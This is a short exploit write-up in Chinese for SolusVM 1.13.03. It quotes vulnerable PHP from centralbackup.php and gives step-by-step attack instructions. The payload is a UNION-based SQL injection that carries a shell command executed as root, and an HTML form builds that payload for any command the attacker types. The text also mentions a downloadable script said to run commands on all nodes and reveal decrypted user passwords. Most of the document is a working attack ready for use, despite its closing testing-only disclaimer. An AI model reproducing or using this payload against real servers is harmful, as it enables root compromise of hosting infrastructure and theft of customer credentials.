SolusVM 1.13.03 Vulnerabilities

/centralbackup.php:

<?php
if ($_POST['delete']) {
    $xc = $db -> query('SELECT * FROM centralbackup WHERE id = \'' . $_POST['deleteid'] . '\'', true);
    #[...]
    if ($xc[status] == 'failed') {
           exec('php /usr/local/solusvm/system/bus.php -- --comm=deletebackup --serverid=' . $xc['bserver'] . ' --nodeid=' . $vdata['nodeid'] . ' --vserverid=' . $vdata['vserverid'] . ' --filename=' . $xc['filename']);
    #[...]
    }
 }
?>
到了这里我们该怎么做的？SQL注入？exec()？setuid为0？都正确！

让我们来看看exp是怎样的？非常简单的三步

1.在激活的VM中拥有一个账户

2.登陆，在VM中点击，拷贝GET _v值

3.POST 至/centralbackup.php?_v=[value]

delete=1&deleteid=-1' union select 0,0,0,0,0,'failed',';/usr/local/solusvm/core/solusvmc-node --ebtables ";command to run as root";',0#
或者使用以下Html表单

<html><body>
     <script>
     function construct() {
         var sql='-1\' union select 0,0,0,0,0,\'failed\',\';/usr/local/solusvm/core/solusvmc-node --ebtables ";'+document.forms['form']['deleteid'].value+'";\',0#';
         document.forms['form']['deleteid'].value=sql;
         return true;
     }
     </script>
     <form name='form' method='post' action='http://CHANGE_ME:5353/centralbackup.php?_v=CHANGE_ME' onsubmit="return construct();">
     <input type='hidden' name='delete' value='1'>
     CMD: <input type='text' name='deleteid' size='100'>
     <br><input type='submit'>
     </form>
</body></html>

作为红利，你可以wget如下地址，这个脚本可以在所有节点执行命令，显示所有用户的解密密码等。（用于安全漏洞测试，禁止非法用途）